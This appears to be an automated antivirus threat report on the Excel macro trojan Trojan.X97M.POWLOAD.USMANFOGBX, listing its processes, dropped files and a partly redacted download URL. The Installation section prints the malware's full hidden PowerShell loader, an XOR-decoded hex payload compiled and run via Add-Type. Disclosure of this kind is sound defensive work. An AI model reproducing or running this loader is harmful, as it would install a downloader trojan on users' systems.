Trojan.X97M.POWLOAD.USMANFOGBX

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Arrival Details

This Trojan arrives on a system as a file dropped by other malware or as a file downloaded unknowingly by users when visiting malicious sites.

Installation

This Trojan adds the following processes:

• powershell -WindowStyle Hidden function c7282f5 {param($d781e97)$d68f49='nb77df';$m8569d5='';for ($i=0; $i -lt $d781e97.length;$i+=2){$zec55a=[convert]::ToByte($d781e97.Substring($i,2),16);$m8569d5+=[char]($zec55a -bxor $d68f49[($i/2)%$d68f49.length]);}return $m8569d5;} $f972cf = '1b115e5903463d1b4443010b5517445e0a014e314e441003034c65420a12070f52192d081a07455814350b10415e07031d5942440d080942644e17120b0f19730d07090c5844100f0d110c42170f000517641d151a075a192d295517445e0a014e314e441003034c7952105d63684742060a0701175408071d11175600005c560e0e1f3d2a0e5b7e09160110431f460d0b10595208555c401b720a121c1b67580d081a5f157001123e10585425020a1052441744473f17471104020b541717120f165e544403161652450a46270c436710144e0303010255462b594334121c424602560259561b441014070c5017065308570453054f5539735b082f03125845104e4c0952450a030251051548462b0c43451d36010b5943445b4e407b580502220b5545051417401e6a44161b005b5e07461d1656430d054e074f43011400427e5910361a10174251575f5a06534c151a105e59034601530e0655500d4b0c6c200a022b5a470b141a4a155c011400075b0456444242725910141732585e0a125340615e16121b035b6716091a075443464f33424742060a0701174410071a0b5417011e1a0745594404010d5b1710525954031f2d081a324345441e5b5b0556555542377e5910361a10174651540f511b17110f001617535d5f5b5b561b44091b1617420d081a42555107025c51531e5f3d2a0e5b7e09160110431f462d0b10595208555c4c535b08444242725910141732585e0a1253406543082b0114527a010b01104e1548463d07437b05151a2745450b145304565b1703473f174410071a0b5417011e1a0745594410010b531717505a07061f2d081a324345441f0d0605005655422b594334121c424d0e0204084e5e59104602540e0e57500f4b0c471104020b541717120f165e54440f0016174e505558541f1e1f2f0016674316461a07530205055c420a1711535f530f06004e0d55050f56005b4a150702560856030201520f52050756560b401e1e5f0f084a435200530f01050a592f001667431648340745584d1d090d4358440b0a5a030e505d132b594334121c424f5157005b030a56505008511f4301025b035405480559500f0502534640055154005a56025257515e57075154055957030554545e52075555564c4b1e0c0d00461a510402530f5f0a7e0a123e1645193e031c0d1e4c03091a0d175a005e5a5b030c1933270c436710144e0e015453030b540a1f312f00166743164f5b59425e0a124e05005207005d5f070c0d004643430353505a4a4f5157005b031b5b52055907520148561656071b0b131a425000010508511e1e1f0101165817090256560e035f1b2c1b43523f3b4e04560552545f5f4c071c555f4e074f020042524f0e541b552b594334121c425f0150040c550a7a05141d0a565b4a27020e58542c21020d5556084e5d4b0c7a05141d0a565b4a2501124e1f02075c5405064856420a01030604594e041e5f15585652064c080b15177e0a123e16451f1c005d0402564a32012b59435252464b1c071c565e53551e480e58565555534a5d4b0c5a005e5a5b030d44310b00745b0d030016174f56500a03530a0a03194260520625020b5259104e47594443160f0005175b5d020a000a720a10071058590903001619700112280d5b5301143e03435f4c2300145e450b08030759434a351e07545e050a280d5b53011440234747080f0d03435e0b082a0343564d4d4c3e6b595c050d0756154f0559500f0502534640030754515a040205464f551a050100070a4c73581308020d5653220f02071f545354565051024c445e54060150555a550252505f5a53060551075b03075555565e55070050525f5b075355545a53075451545a52035555575f07035151525b5a075655545e00075450555f5a060754035e00075151545a56035554525e51035351535b00070655535f06035451545a040706464f420e0e530004475967450b050b11446410071c167e5902094e0352540550530c524044361c0d545217153d165645102f0004581f085f0a06551e5f361c0d545217154031435616124603525405504759455210131c0c17075f1b1e17555b0d054e114356100f0d424443160f000517545354565051024c151a105e5903461a5a0253575747194443160f0005174651540a55030a46080c5500530244551143450d080942420255575653530a37121c0b59504a230312434e5f0001101f5e0a124e0b0a075f0f52160f0200555f4c7b520a011a0a0c5e4f5b5c4b4c551d120b42560352005d5f74580a100b10431930092c1b43524c125657530455483d1755441014070c501f0d4a5c4b1b06524f55170206555e5f061c0a4c050603451e4c075a54510444384e13020500515a391f5e4b544742121715535c0600034a2a0b0c50430c3b47594a4501121b10591711535f530f06005d131f'; $f972cf2 = c7282f5($f972cf); Add-Type -TypeDefinition $f972cf2; [adf2499]::y4366();
• "%Windows%\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"%User Temp%\njnb7zgi.cmdline"
• %Windows%\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%User Temp%\RESFC97.tmp" "%User Temp%\CSCFC77.tmp"

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).)

Dropping Routine

This Trojan drops the following files:

• {malware file path and name}
• %User Temp%\njnb7zgi.dll
• %User Temp%\njnb7zgi.pdb
• %User Temp%\njnb7zgi.cmdline
• %User Temp%\njnb7zgi.out
• %User Temp%\8529093.od
• %Application Data%\n8ccea.exe
• %User Temp%\njnb7zgi.0.cs
• %User Temp%\njnb7zgi.err
• %System Root%\BVTBin\Tests\installpackage\csilogfile.log

(Note: %User Temp% is the current user's Temp folder, which is usually C:\Documents and Settings\{user name}\Local Settings\Temp on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Local\Temp on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %Application Data% is the current user's Application Data folder, which is usually C:\Documents and Settings\{user name}\Application Data on Windows 2000(32-bit), XP, and Server 2003(32-bit), or C:\Users\{user name}\AppData\Roaming on Windows Vista, 7, 8, 8.1, 2008(64-bit), 2012(64-bit) and 10(64-bit).. %System Root% is the Windows root folder, where it usually is C:\ on all Windows operating system versions.)

Other Details

This Trojan connects to the following possibly malicious URL:

• http://{BLOCKED}es.it/new/wp-content/themes/bm/bless.exe

This report is generated via an automated analysis system.